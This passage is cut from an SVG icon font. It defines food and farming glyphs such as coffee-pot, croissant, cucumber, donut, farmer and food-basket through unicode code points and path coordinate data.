7h0c1 0 2 2 2 3 0 2-1 2-3 2-24 3-49 1-72-3-7-2-14-4-21-6-26-7-59-24-64-57-2-12 1-21 7-28 15-16 46-17 70-15z m531-266c-30 34-77 53-138 56-8 34-35 60-67 60h-464c-37 0-68-35-68-78v-405c0-41 28-75 63-79v-37c0-9 7-16 15-16h445c8 0 15 7 15 16v37c35 4 63 37 63 79v56c48 13 89 40 120 81 32 42 42 83 43 87l1 1c12 59 3 107-28 142z m-65-124c0-3-8-29-28-55-12-16-27-29-43-38v185c22-1 49-7 63-23 12-14 15-37 8-69z" />
<glyph glyph-name="coffee-pot" horiz-adv-x="1000" unicode="&#xeb58;" d="M773 551l-7 3h-112l12 86-551 60 71-181c-76-66-123-164-123-274 0-95 36-181 95-246h527c59 65 95 151 95 246 0 86-29 166-79 228h51c31-17 171-111 85-376-7-21 2-44 21-52 5-2 9-2 13-2 15 0 29 10 34 26 96 294-44 444-132 482z m-55-186c-2 1-3 2-5 3-5 3-10 5-17 6-90 17-192 11-268-16-91-32-199-36-304-11-1 0-2 1-3 1 16 66 52 123 102 165h397c14-12 28-25 40-40 26-31 45-68 58-108z" />
<glyph glyph-name="cola" horiz-adv-x="1000" unicode="&#xeb59;" d="M387 289c-29-9-42 6-42 30 0 22 9 43 21 58 10 11 24 20 38 24 13 4 23 5 28 3l7 23c-4 2-16 2-32-3-21-6-39-17-55-33-21-23-34-52-34-83 0-38 24-54 62-43 18 5 31 12 39 18l-3 20c-8-6-18-11-29-14z m189 70c0-21 12-32 31-27 14 4 28 15 38 38l1 0c-1-9-2-18-2-24l23 7c0 12 2 32 5 49l11 59c-9 0-21-2-32-5-50-15-75-61-75-97z m73 48c-5-29-20-48-32-51-11-3-15 4-15 16 0 24 18 55 42 62 4 2 8 2 10 2l-5-29z m-162 0c-36-10-61-49-61-85 0-25 17-38 43-31 36 11 62 50 62 86 0 23-15 39-44 30z m-14-95c-13-4-21 4-21 19 0 19 12 50 32 56 16 4 20-8 20-19 0-20-12-50-31-56z m264-303v625c0 19-31 73-46 99v13c6 4 9 11 9 18 0 11-8 20-20 21-4 0-45 3-182 3-134 0-168-3-173-3-11-1-20-10-20-21 0-5 1-9 4-12v-19c-15-26-46-80-46-99v-630l1-2 0-1s0-1 0-2c1 0 1 0 1-1 0 0 0-1 0-1s1-1 1-1l1-1 1-1 1-1s1 0 1-1c1 0 1 0 1 0 2-1 11-5 28-11-2-2-2-4-2-7v-22c0-6 4-12 10-13 6-2 99-27 206-27 63 0 131 9 188 36 5 2 8 7 8 12v17c0 3-1 5-2 7 8 2 15 5 22 8 7 2 10 10 8 17z m-28 249c-12 3-25 6-39 8-22 2-48 3-73-1-7-1-14-2-20-3-7-2-13-4-19-6-13-3-26-9-39-15-6-3-12-6-18-9-6-4-11-7-17-11-5-4-11-9-17-13l-8-7-6-6c-8-7-16-15-25-23l-11-11-12-10-11-9c-4-3-8-6-12-9-5-3-9-6-13-9l-12-8-13-8c-4-2-8-4-12-6-5-3-9-5-13-7-5-2-9-4-13-6l-13-5c-1 0-2-1-3-1v370l15 2c6 1 11 2 16 3 6 1 11 2 17 4l16 5c6 2 11 4 17 6 5 2 11 4 16 7 6 2 12 4 17 7 5 3 11 6 16 10 6 3 11 6 16 9l15 11 15 11c5 4 10 8 15 12l25 25 6 5 5 5c3 3 7 5 11 8 4 3 8 6 11 8s8 6 12 8c4 2 8 5 13 7 3 2 8 4 12 5 4 2 9 4 13 6l6 2 7 2c35 10 73 12 106 10 0 0 1 0 1 0v-373z m-149 217l-29-163 25 7 30 164-26-8z" />
<glyph glyph-name="corn" horiz-adv-x="1000" unicode="&#xeb5a;" d="M532 35h-25c-364 61-43 684-205 740 59-14 96-58 120-118 2 5 3 10 5 14h11c-3-12-5-25-7-37 3-10 6-19 8-29 1 4 2 8 3 13h59v-51h-53c1-5 2-9 2-14h51v-44h-44c0-5 1-9 1-13h43v-38h-39l1-14h38v-46h-35c1-4 1-9 1-13h34v-38h-32l0-14h32v-44h-30c1-5 1-9 1-13h29v-52h-26c0-4 0-9 1-13h25v-40h-22c0-5 1-9 2-14h20v-42h-13c1-4 2-9 3-13h10v-31c5-11 11-20 17-26 5 5 9 11 12 18-5-4-10-7-16-8v47h28c1 4 1 9 2 13h-30v43h35c0 4 0 8 1 13h-36v40h38l0 13h-38v52h41l1 13h-42v44h46c1 5 1 9 2 14h-48v38h54c1 4 2 9 3 13h-57v46h70c2 5 4 9 6 13h-76v38h73c1-13 2-25 3-37 3 7 7 15 11 22 0 5-1 10-1 15h13c3 5 8 10 12 14h-26c-2 14-3 29-6 44h25c3-14 5-29 8-44 16 16 37 27 62 32-128-38 124-457-156-506z m-12-123h-9c-9 0-18 8-20 18l-11 73c-2 10 5 17 14 17h51c9 0 15-7 13-16l-17-74c-2-10-11-18-21-18z m199 379c-35-89 42-257-123-266 133 58 69 197 123 266z m-438 56c65-84-11-252 146-322-195 11-104 214-146 322z m151 338c5 15 11 29 17 42h2c-4-14-7-28-10-42h-9z m142-14h15c4-12 8-26 12-40h-19c-3 14-5 27-8 40z m-30 70h-30v47c11-3 21-11 31-24l-7-2c2-7 4-14 6-21z m-71 21l-3 1c10 14 20 22 31 25v-47h-33c2 7 3 14 5 21z m83-15c1-2 3-4 4-6h-2c-1 2-1 4-2 6z m5-20h6c6-13 11-27 17-42h-13c-3 14-6 28-10 42z m23-109h20c4-17 8-34 12-51h-24c-2 17-5 34-8 51z m-6-51h-64v51h56c3-17 6-34 8-51z m-64 118v42h34c3-14 6-28 9-42h-43z m66-132c2-15 4-30 6-44h-72v44h66z m-116 174h37v-42h-46c3 14 6 28 9 42z m-12-56h49v-40h-57c2 14 5 27 8 40z m62-40v40h46c3-13 6-26 8-40h-54z m-13-122h13v-13h-13v13z m0-162h13v-13h-13v13z" />
<glyph glyph-name="croissant" horiz-adv-x="1000" unicode="&#xeb5b;" d="M778 493c-54 43-75 43-129 0-16-13-33-26-46-42-34-43-68-88-100-133-13-19-29-26-50-21-21 6-36 18-37 41-1 32-6 64-1 95 8 52 23 103 36 155-7 0-17 0-28 0-48 1-80-19-97-65-29-76-38-152-23-231 5-26 20-46 49-53 86-20 172-40 258-59 12-3 32-2 40 6 69 67 126 143 151 236 7 27 1 53-23 71z m-350-156c3-11 18-25 31-29 8-3 26 6 33 15 59 87 116 174 223 221-11 10-18 18-26 23-61 35-126 41-193 27-13-2-27-14-33-25-37-74-49-151-35-232z m388 100c-23-103-86-183-156-262 25-10 48-18 70-29 25-12 48-8 66 11 26 28 54 57 74 90 45 71 23 144-54 190z m-484 127c-31-9-59-11-82-23-19-10-41-27-48-46-23-62-27-127-13-192 5-23 19-43 47-46 21-1 43 0 66 0-32 105-18 204 30 307z m-154-88c-28-21-52-45-73-71-27-32-44-68-42-109 1-31 17-44 49-38 24 5 48 10 76 15-27 67-18 133-10 203z m731-192c-36-49-72-99-110-150 19-9 41-21 63-31 26-10 47-1 61 22 26 41 15 128-14 159z" />
<glyph glyph-name="crop-plant" horiz-adv-x="1000" unicode="&#xeb5c;" d="M913 657c18 16 32 46 20 54-10 7-39-30-45-49-2-6-5-14-1-16 5-1 21 7 26 11z m-52-51c12 24 20 64 8 69-16 6-35-29-37-59 0-7 4-29 8-32 0-1 0 0 1-1-10-12-20-25-30-36l0 1c11 21 16 78 1 80-17 3-30-34-26-64 1-7 7-26 12-30-11-12-23-23-35-33l3 6c10 23 12 79-3 81-16 2-28-36-23-65 1-7 9-26 14-30-11-9-22-17-33-26 1 4 3 8 4 11 8 23 5 80-10 80-17 1-25-38-17-67 2-7 11-25 16-28-12-9-24-17-36-25l-3-2c1 3 2 6 4 9 9 23 10 79-5 81-17 2-27-37-22-66 2-7 9-25 15-29-7-4-13-7-20-11-7-5-15-9-23-13 1 2 3 4 4 7 12 21 18 77 3 80-16 4-31-33-28-63 1-7 6-25 11-30-1-1-3-1-4-2-12-6-25-13-37-19 1 2 2 4 3 5 13 21 23 76 9 81-17 4-33-32-33-62 1-6 5-24 9-30-10-5-21-10-32-16-3-2-7-4-11-6 2 2 3 4 5 6 14 19 28 74 14 79-16 6-35-29-37-59 0-7 3-27 8-31-14-8-28-15-42-23 0 1 1 2 2 4 15 19 29 74 15 79-16 6-35-29-37-59 0-7 3-25 7-31-2-1-4-2-6-3-11-7-24-14-35-20 15 19 32 70 18 76-15 7-36-26-40-56-1-6 1-24 4-31-9-5-18-11-27-16-26-17-53-32-76-50-23-18-47-34-67-53-10-9-20-17-29-26-5-4-10-8-14-12-4-5-9-9-13-13-4-5-8-9-12-13l2 3c2 5 4 10 6 14 2 5 4 10 6 14 1 5 3 10 4 15 3 9 4 18 6 27 1 8 3 17 3 24 1 8 2 15 2 21 0 6 1 12 1 16 0 9 0 14 0 14s-1-5-2-13c-2-9-3-22-6-37-1-7-3-15-5-24-2-8-5-17-8-26-1-4-3-9-4-13-2-5-4-9-6-14-2-5-4-9-6-13l-4-7 0-1c0-1-1-1-1-2l-2-3-8-13c-3-4-6-8-9-12-4-5-8-10-12-15h1c-17-19-34-39-50-60-1-1-2-2-1-3s0-2 1-3c2-2 5-1 6 1 48 57 136 109 149 116 13 7 28 13 43 20 5 2 9 4 15 6 10 4 20 8 31 11 8 3 16 5 24 8l32 7c1 0 3 1 3 1l3 0 13 2c8 1 16 3 25 3 8 1 17 1 25 2 8 0 16 0 24 0 17 0 32-1 47-2 15-2 29-3 42-6 25-3 47-7 62-10 15-3 23-5 23-5s-8 3-22 8c-8 2-17 5-27 8-10 3-22 6-35 9-13 3-27 5-42 8-15 2-30 5-47 5-8 1-17 1-25 1l-26-1c-9 0-18-2-26-3l-14-2-3 0c-2 0-2-1-4-1l-6-1-25-7c-9-2-17-5-26-8-6-2-13-4-19-7l-5-2c-8-4-16-7-23-10-15-8-30-15-42-23-14-8-26-15-37-23-11-7-20-14-29-21-4-2-7-5-10-7 12 11 25 23 39 37 5 3 9 8 14 12 4 4 9 8 14 12 9 7 19 16 30 24 20 17 43 34 67 51 22 18 48 33 74 51 4 3 8 6 13 8 4-6 16-17 21-20 25-14 65-16 68 1 3 15-49 31-73 30 13 8 26 16 40 24 2-6 16-20 22-23 26-14 65-16 68 1 4 14-49 31-73 29-2 0-4 0-6-1 15 9 30 18 46 27 2-7 14-21 20-24 23-17 63-23 68-7 4 15-47 37-71 37-2 0-4 0-6 0 8 4 15 8 22 12 5 3 10 6 15 8 1-6 16-20 23-24 25-14 64-16 68 0 3 15-50 33-73 31l-7-1c14 8 28 15 42 23 2-6 16-20 23-24 25-15 64-17 68 0 3 15-50 32-74 30-2 0-4 0-5 0 12 7 25 14 37 22 4 2 8 4 11 7l1 0c14 9 28 18 42 27 0-6 14-22 20-26 24-17 63-23 68-6 4 14-47 36-71 37-3 0-8 0-11-1 10 8 21 15 31 23 3-6 17-18 22-21 26-14 65-15 69 2 3 15-51 31-75 28-2 0-4-1-6-1 8 7 17 14 25 22l0-1c3-5 22-14 29-16 29-6 67 4 65 22-1 15-57 15-79 5l-7-3c11 10 21 21 32 32-1-1-1-3 0-4 3-4 24-9 31-9 29 1 64 19 59 35-5 15-59 3-79-11-2-2-5-4-7-6 9 10 18 21 26 32 8-2 25 1 31 3 27 9 55 38 45 52-8 11-44-9-63-28z m-182-186c-7 0-18 1-18-4 0-6 15-22 21-26 24-17 63-23 68-7 4 15-47 37-71 37z" />
<glyph glyph-name="cucumber" horiz-adv-x="1000" unicode="&#xeb5d;" d="M838 635c-43 40-91 71-140 100-90 52-183 64-282 32-64-20-124-48-182-81-72-41-117-102-141-180-20-63-28-127-30-193-4-97 26-180 99-247 51-45 107-84 169-115 72-37 148-46 227-24 75 21 146 53 213 94 65 40 111 97 134 171 23 71 33 144 33 219-1 89-34 164-100 224z m36-426c-22-69-66-121-128-158-62-37-128-67-197-87-71-22-140-15-206 16-62 29-119 66-169 112-57 52-84 118-84 196 1 65 11 130 30 193 21 72 64 127 129 166 64 38 133 69 205 90 63 17 126 13 186-12 67-29 127-69 181-117 61-55 87-124 85-205-1-66-12-131-32-194z m-361 245c4 0 8 1 12 4 27 16 44 41 61 65-1 1-1 2-2 3-16-7-32-12-47-19-13-7-26-16-39-24-5-4-10-9-6-17 4-8 11-14 21-12z m11-120c11 11 11 27 2 36-13 13-34 11-48-3-11-12-12-27-2-37 13-11 36-10 48 4z m-134-22c-23 17-50 26-78 34-1-1-2-2-2-3 16-19 33-38 50-55 7-6 15-10 23-15 7-3 11-1 15 5 8 12 6 24-8 34z m244 172c-10-25-20-50-29-76-2-6-3-12-3-18 0-11 4-15 15-15 12-1 20 6 23 21 7 29 2 58-2 87l-4 1z m-126-266c-7 9-15 17-24 25-10 9-19 6-24-6-5-10-2-19 8-30 21-20 46-32 74-45-4 7-6 12-9 17-8 13-15 26-25 39z m-103 227c-31-2-57-17-84-30 0-2 0-3 1-4 25-2 50-3 75-4 8 0 15 1 23 4 11 3 13 9 10 20-4 10-11 15-25 14z m212-140c-11 1-21-4-23-15-2-6-2-13-2-20 2-26 11-51 23-75 2 8 5 15 6 23 3 24 6 47 7 71 1 7-1 15-11 16z m174 292c-40 35-83 63-129 87-65 35-133 47-205 27-68-19-132-48-192-85-56-34-96-83-116-146-21-64-32-130-30-198 2-72 31-131 85-179 42-37 89-67 139-92 68-35 138-42 211-19 61 19 120 45 175 78 54 33 94 77 115 137 25 71 37 144 33 219-3 69-34 125-86 171z m-310-106c11 10 23 19 36 26 32 18 68 29 105 38 1 1 2 1 7 1-15-23-29-44-43-64-13-19-29-37-49-49-22-14-45-10-58 9-10 14-10 28 2 39z m-16-111c21 21 54 23 74 4 17-17 16-45-1-63-21-22-56-23-76-3-16 16-15 43 3 62z m-53-114c-8-12-19-17-32-11s-26 14-36 23c-30 27-53 60-75 94 0 1 0 2 1 3 21-5 42-10 63-16 24-7 47-16 68-32 22-16 27-40 11-61z m-25 122c-39-1-76 7-113 15-1 1-2 1-4 3 41 25 81 51 129 57 28 4 48-11 51-37 1-14-4-25-17-29-15-5-31-9-46-9z m190-259c-45 16-89 32-123 67-7 7-12 18-15 28-3 15 8 33 21 40 15 7 27 0 38-8 24-20 40-47 55-73 9-18 17-35 26-52l-2-2z m51 43c-3-9-7-18-11-30-21 42-40 83-43 129-1 10 1 20 4 30 10 24 46 32 61 12 5-8 8-19 8-29 3-39-8-76-19-112z m29 217c-5-25-24-36-48-32-14 2-22 11-24 24-1 8-1 16 0 23 9 47 34 88 59 131 9-31 16-61 17-91 1-18 0-37-4-55z" />
<glyph glyph-name="culinary" horiz-adv-x="1000" unicode="&#xeb5e;" d="M510 652c-165 0-300-136-301-302 0-166 136-302 301-302 168 0 303 135 303 302 0 167-135 302-303 302z m-4-545c-131 2-239 110-238 244 0 135 109 243 247 242 124-1 239-99 240-243 0-144-118-246-249-243z m3 469c-124-1-223-101-224-227 1-127 104-227 230-226 123 2 224 105 223 228-2 126-104 227-229 225z m429-499s0 169-1 186c1 16 0 385 0 385h-8s-69-39-69-326c53-15 30-73 26-80 0-15 2-165 2-165h0l0-1c0-13 11-25 25-25 13 0 24 12 24 25 0 0 0 1 0 1l1 0z m-776 566l4-157h-18v157h-13v-158h-15v158h-14v-158h-18l5 158h-14l-16-133s0-5 0-7c0-21 9-39 24-51 49-56 16-112 16-126 0-14 0-243 0-243l0-1c0-14 11-25 25-25 14 0 25 11 25 25 0 0 0 0 0 1h0v243c0 16-28 81 19 129 0 0 0 0 1 0 11 11 19 26 20 43 0 1 0 4 0 4l-16 141-15 0z" />
<glyph glyph-name="cup-cake" horiz-adv-x="1000" unicode="&#xeb5f;" d="M724 252c-36-34-73-24-111 0-32-29-67-25-103-6-5 2-14 4-19 2-37-21-73-26-107 5-39-27-76-33-107-5-23-9-42-21-60-21-18 0-37 12-54 18 0 0 0-2 0-3l4-11c33-94 66-189 101-283 5-12 21-20 33-29 4-4 11-5 17-7h362c36 8 51 32 62 66 20 65 45 128 68 192 6 19 13 38 20 58 2 8 5 16 8 24-49-35-63-34-114 0z m-350-268c0-2-2-3-4-3h-18c-3 0-5 1-5 3v139c0 2 2 3 5 3h18c2 0 4-1 4-3v-139z m96 0c0-2-2-3-4-3h-18c-3 0-5 1-5 3v139c0 2 2 3 5 3h18c2 0 4-1 4-3v-139z m91 0c0-2-2-3-4-3h-18c-2 0-4 1-4 3v139c0 2 2 3 4 3h18c2 0 4-1 4-3v-139z m92 0c0-2-2-3-5-3h-18c-2 0-4 1-4 3v139c0 2 2 3 4 3h18c3 0 5-1 5-3v-139z m75 562c-7 0-14 0-20-1-5-1-10 2-11 7-18 66-68 119-133 141-13-22-36-37-64-37s-51 15-64 37c-65-22-115-75-133-141-1-5-6-8-11-7-6 1-13 1-20 1-90 0-162-73-162-163 0-46 19-88 50-117 4-4 11-7 15-7 11-2 30-3 42-3 16 0 32 9 52 17 4 2 11 1 14-2 28-20 60-16 94 5 4 3 10 2 14-1 32-24 66-18 100 1 5 2 14 1 19-2 34-17 66-22 97 1 3 3 10 4 14 1 32-19 65-26 97-2 4 3 10 4 14 1 37-22 72-19 89-18 5 0 11 2 15 5 33 30 54 73 54 121 0 90-72 163-162 163z m-228 128c21 0 39 11 49 28 5 8 8 18 8 29 0 31-26 57-57 57s-56-26-56-57c0-11 3-21 8-29 9-17 27-28 48-28z" />
<glyph glyph-name="dining-table" horiz-adv-x="1000" unicode="&#xeb60;" d="M815 363v49c0 8-6 14-14 14h-602c-8 0-14-6-14-14v-49c0-8 6-14 14-14h171v-30h61v-229c0-1 0-1 0-2h-61v-30h261v30h-62c0 1 0 2 0 2v229h62v30h170c8 0 14 6 14 14z m-709-121l-16 245h-27v-429h27l8 92h137l11-92h16v184l-156 0z m127-77h-133l3 31h126l4-31z m673 322l-15-245h-168v-184h27l11 92h137l8-92h31v429h-31z m-143-322l4 31h127l2-31h-133z m-94 313h-29c-5 82-54 119-128 131 7 10 9 20 0 28-7 7-16 7-23 1-8-6-9-15-1-30-36-3-66-15-91-40-25-24-37-54-36-90h-30v-22h338l0 22z m-261 13h-26c-2 55 46 102 108 106-70-33-84-51-82-106z" />
<glyph glyph-name="donut" horiz-adv-x="1000" unicode="&#xeb61;" d="M500 788c-242 0-437-196-437-438s195-438 437-438c241 0 438 196 438 438s-197 438-438 438z m20-164c6 1 13-7 14-19 2-12-1-23-7-24-7-1-13 8-16 20-1 12 2 23 9 23z m-70-72c8 11 19 16 24 12 5-5 1-17-7-27l-7-9c-9-10-20-16-25-11-5 4-2 16 7 27l8 8z m-45 96c6 3 17-3 23-15l1-1c7-12 8-24 3-27-5-4-16 3-23 15l-1 2c-7 11-8 23-3 26z m-204-84l-6-10c-7-11-18-17-23-14-6 4-4 16 4 27l6 10c7 11 18 18 23 14 6-4 4-16-4-27z m38-151c-14 1-24 6-24 13 1 6 11 11 24 10 13 0 24-5 23-12 0-6-10-11-23-11z m33 64c-5-3-15 4-23 15l0 2c-7 12-9 24-3 27 5 3 15-3 22-15l2-1c6-12 8-24 2-28z m71 88c-4-4-16-1-26 8l-23 20c-10 9-15 20-10 25 4 5 15 1 25-8l23-19c10-9 15-20 11-26z m15-39c5 5 16-1 25-12l5-7c9-11 12-22 7-26-5-4-16 1-25 12l-6 7c-8 10-11 22-6 26z m80-408c0-15-12-28-26-28-15 0-27 13-27 28v86c0 2 1 4 1 5 15-15 33-27 52-35v-56z m69 33c0-15-12-28-26-28-14 0-26 13-26 28v17c14-4 29-7 45-7 2 0 5 1 7 1v-11z m62-71c0-15-12-28-26-28-15 0-26 13-26 28v82c18 2 34 7 50 15 2-4 2-7 2-11v-86z m63 71c0-15-11-28-26-28-14 0-26 13-26 28v32c20 12 38 29 52 48v-80z m-132 61c-76 0-138 61-138 138 0 76 62 139 138 139s139-63 139-139c0-77-63-138-139-138z" />
<glyph glyph-name="egg-plant" horiz-adv-x="1000" unicode="&#xeb62;" d="M937 415c-1 3-3 4-5 3-1-2-2-3-3-3-9-1-21 9-20 18 0 12 2 24 1 35-2 20-4 39-8 58-1 6-4 11-7 16-6 8-16 4-20-7-9-22-17-44-25-65-6-14-8-20-5-25 6-10 12-14 9-14-3 0-5 0-7 0-25-1-32 8-27 33 6 30 8 61 3 92-3 19-8 21-24 11-27-17-50-39-69-63-12-15-25-16-38-2-3 2-5 5-7 8-3 4-5 7-3 6 2 0 3-1 4-1 16-8 18-7 27 9l31 59c3 5 5 9 8 14 4 8-2 17-13 16-11-2-21-7-31-13-18-13-36-28-53-44-8-7-16-5-24-4-3 0-7 4-9 7-1 3-1 5-3 4-3-2-1-7 5-12 6-4 11-8 10-8 0 0 0-1-1-1-68-43-91-84-223-73-15 2-31-1-45-3-61-10-113-39-161-75-43-33-80-71-103-120-21-45-57-100-26-141 17-23 43-63 64-82 105-93 250-81 379-27 67 28 124 72 177 121 84 78 153 168 213 266 1 1 2 2 2 3 1 2 9 2 16 1 8-2 13 0 11 3z m-298 141c3 1 6 3 9 6 18 15 36 33 57 46 13 8 30 12 45 14 20 2 22-4 14-21-15-28-31-56-46-86-6-10-7-16-3-13 2 1 4 3 6 5 13 13 24 27 37 39 13 12 28 22 43 31 16 9 26 5 30-14 3-13 4-27 3-41-1-22-4-43-6-65-1-3-2-6-1-9 1-4 6-1 7 4 1 3 2 6 3 9 6 18 13 36 20 54 6 14 12 28 18 42 4 9 9 9 16 3 3-3 5-5 7-8 14-17 19-37 20-58 1-20 0-40 0-61 0-4 0-7 0-8 2-5 8 3 9 10 0 5 1 9 1 14 3 17 7 33 7 50 1 43-11 81-46 110-3 2-5 6-5 10 1 25 4 50 15 72 6 10 5 24-5 28-19 7-40-1-50-20-3-8-7-15-11-21-10-18-20-30-46-26-42 7-78-11-108-41-13-12-24-25-36-39-7-8-9-19-4-16z" />
<glyph glyph-name="egg-poached" horiz-adv-x="1000" unicode="&#xeb63;" d="M933 325c-6 42-26 77-60 104-24 19-52 32-79 45-29 15-58 30-80 54-13 14-24 29-35 45-41 58-89 105-154 135-96 43-191 42-282-9-94-52-151-134-172-239-16-77-8-153 12-230 4-11 8-23 12-35 15-40 36-78 67-109 37-36 79-61 133-56 36 3 70 12 106 19 26 4 52 7 79 1 23-5 42-17 62-29 30-18 61-37 95-49 42-15 84-15 125 5 28 13 52 32 73 55 76 83 116 179 98 293z m-34-96c-16-81-55-149-120-201-34-27-72-39-115-28-26 7-50 19-73 32-19 11-38 23-57 34-36 21-76 26-118 20-32-5-63-12-95-18-51-12-95 3-132 40-26 27-45 59-59 94-29 74-39 151-28 230 15 112 73 197 176 246 82 39 164 32 245-8 53-26 93-68 126-116 20-27 39-55 67-74 25-15 50-29 75-43 18-10 35-19 52-29 27-17 44-42 50-65 12-43 13-78 6-114z m-449 274c-94-25-148-118-123-212 24-91 120-145 212-120 91 25 145 120 120 211-25 91-119 146-209 121z m16-75c-48-14-70-64-66-103 0-5 1-10 2-15 1-10-4-19-13-20-10-2-18 4-21 14-12 55 13 132 86 156 11 3 21-1 24-10 4-9-1-19-12-22z" />
<glyph glyph-name="farmer-alt" horiz-adv-x="1000" unicode="&#xeb64;" d="M469 388c9-84 75-150 155-150 80 0 146 66 155 150 88 13 146 78 148 82 15 17 14 44-3 60-17 15-43 14-58-4 0 0-40-45-98-53-4 10-9 19-14 28 0 1-20 188-20 188 0 7-8 12-17 12h-199c-9 0-16-6-16-12 0 0-15-193-12-195-4-7-7-14-10-21-57 8-97 52-98 53-15 18-41 19-58 4-17-16-18-43-3-60 3-4 60-69 148-82z m42 102h226c4-6 7-12 10-19h-246c3 7 6 13 10 19z m248-103c-9-73-66-129-135-129-69 0-125 56-135 129h270z m-505-4c0-33-17-62-43-78v165h-18v-173c-13-4-36-4-50 0v173h-18v-165c-26 15-44 45-44 78v87h-18v-87c0-57 42-103 96-108v-276h19v276c53 5 94 52 94 108v87h-18v-87z m408-161l-3 0c-11 2-22 3-34 3h-1l-1 0c-11 0-22-1-33-3l-4 0c-123-16-225-104-269-223h614c-43 120-146 208-269 223z" />
<glyph glyph-name="farmer" horiz-adv-x="1000" unicode="&#xeb65;" d="M686 541c-1 0-1 0-1 0-7 12-16 23-27 31v-103l45-70c13-18 12-59 0-86l-2 58-59 93v119c-6 4-14 7-21 10v-65h-73v65c-8-3-15-6-22-10v-119l-58-92-3-414c0-25 20-45 44-45s44 20 44 45c0 0 20 294 31 294 11 0 31-294 31-294 0-25 20-45 44-45s44 20 44 45l0 293c14-7 31-6 43 9 56 75-12 214-60 281z m-123-124c-8 0-14 6-14 14s7 14 14 14 14-6 14-14c0-8-6-14-14-14z m43 0c-8 0-14 6-14 14s6 14 14 14c7 0 13-6 13-14 0-8-6-14-13-14z m-95 155c-13-10-119-159-123-167-18-6-37-10-55-14v82c46 5 82 44 82 93v74h-16v-74c0-29-15-53-37-67v141h-16v-148c-11-4-31-4-43 0v148h-16v-142c-23 14-38 39-38 68v74h-16v-74c0-49 37-89 83-93v-85c0-1 0-1 0-1-34-7-27-53 0-61v-414h17v413c29 6 59 13 88 23 17 5 29 25 90 120v104z m45-36h57v59c-9 2-19 4-29 4s-19-2-29-4l1-59z m-34 128c4-34 30-60 62-60s59 26 62 60c36 5 59 31 59 32 6 7 6 17-1 24-7 6-17 5-23-2 0 0-16-18-39-21-2 4-4 8-6 11 0 1-8 75-8 75 0 2-3 5-6 5h-80c-4 0-7-3-7-5 0 0-5-77-4-77-2-3-3-6-4-9-23 3-39 21-39 21-6 7-17 8-23 2-7-6-8-17-2-24 1-1 24-27 59-32z m17 40h91c1-2 2-5 3-8h-98c1 3 2 6 4 8z m99-41c-4-29-26-51-54-51-27 0-50 22-54 51h108z" />
<glyph glyph-name="fast-food" horiz-adv-x="1000" unicode="&#xeb66;" d="M645-6c0 4-3 7-6 7h-497c-4 0-6-4-6-7v-40c0-23 17-41 39-41h430c22 0 40 18 40 41v40z m-5 27c20 0 37 20 37 44s-17 45-37 45h-499c-21 0-38-20-38-45s17-44 38-44h499z m-498 154h497c3 0 6 3 6 6v1c0 70-26 128-75 167-45 36-108 55-180 55s-134-19-179-55c-50-39-76-97-76-168 0-3 3-6 7-6z m448 80c10 0 18-8 18-19s-8-19-18-19c-10 0-18 9-18 19 0 11 8 19 18 19z m-70 56c10 0 19-8 19-19s-9-19-19-19c-10 0-18 9-18 19 0 11 8 19 18 19z m-57-56c10 0 18-8 18-19s-8-19-18-19c-10 0-18 9-18 19 0 11 8 19 18 19z m-69 56c10 0 18-8 18-19s-8-19-18-19-18 9-18 19c0 11 8 19 18 19z m-70-56c10 0 18-8 18-19s-8-19-18-19-18 9-18 19c0 11 8 19 18 19z m-57 56c10 0 18-8 18-19s-8-19-18-19c-10 0-18 9-18 19 0 11 8 19 18 19z m-70-56c10 0 18-8 18-19s-8-19-18-19-18 9-18 19c0 11 8 19 18 19z m-80-132h547c7 0 13 6 13 14s-6 14-13 14h-547c-8 0-14-6-14-14 0-8 6-14 14-14z m376 564l134 40c7 2 16 0 22-5 7-5 11-13 11-22v-91h56v91c0 28-12 54-32 70-21 16-48 22-73 14l-133-39c-15-4-24-21-20-37 5-16 20-25 35-21z m361-122h-332c-24 0-43-20-43-45 0-17 9-31 21-39l2-48 1-16c119-53 201-166 201-307 0-73-15-142-54-197h148c29 0 53 24 55 54l21 466 2 48c13 8 21 23 21 39 0 25-19 45-43 45z" />
<glyph glyph-name="food-basket" horiz-adv-x="1000" unicode="&#xeb67;" d="M864 397h-1c-17 0-22 10-10 23l25 24c9 9 9 24 0 33l-33 33c-4 4-10 6-17 6-6 0-13-2-17-6l-64-65c-13-12-23-8-23 10v166c0 3 0 8-39 119 0 0 0 1 0 1-1 1 0 1 0 2l1 0c8 4 13 12 13 20v3c0 12-10 22-22 22h-115c-12 0-22-10-22-22v-3c0-9 6-17 14-20 0 0 1-1 1-1 1 0 1 0 1-1l-1-1c-40-110-40-116-40-119v-220l-115 128c-12 13-32 15-46 4l-104-82-58 59c-4 4-11 6-17 6-7 0-13-2-17-6l-33-33c-4-4-7-10-7-17 0-6 3-12 7-17l24-24c13-12 8-22-9-22h-4c-18 0-32-14-32-31v-59c0-17 13-32 28-32 15 0 32-13 36-30l83-302c5-17 23-31 40-31h418c17 0 35 14 40 31l83 302c4 17 20 30 36 30 15 0 28 15 28 32v59c0 17-14 31-32 31z m-285 333h81l42-110h-160l37 110z m-243-714c0-6-5-11-11-11-7 0-12 5-12 11v206c0 6 5 11 12 11 6 0 11-5 11-11v-206z m117 0c0-6-5-11-11-11-6 0-11 5-11 11v206c0 6 5 11 11 11 6 0 11-5 11-11v-206z m116 0c0-6-5-11-11-11-6 0-11 5-11 11v206c0 6 5 11 11 11 6 0 11-5 11-11v-206z m114 0c0-6-5-11-11-11-6 0-11 5-11 11v206c0 6 5 11 11 11 6 0 11-5 11-11v-206z m190 313c0-17-13-31-31-31h-684c-18 0-31 14-31 31v14c0 18 13 32 31 32h36c17 0 21 10 8 22l-40 41c-13 12-15 30-5 40 9 10 27 8 40-4l98-98c0-1 285-1 381-1 18 0 42 10 54 22l75 76c12 13 31 15 41 5 10-9 7-27-5-39l-41-41c-12-13-8-23 10-23h32c17 0 31-14 31-31l0-15z" />
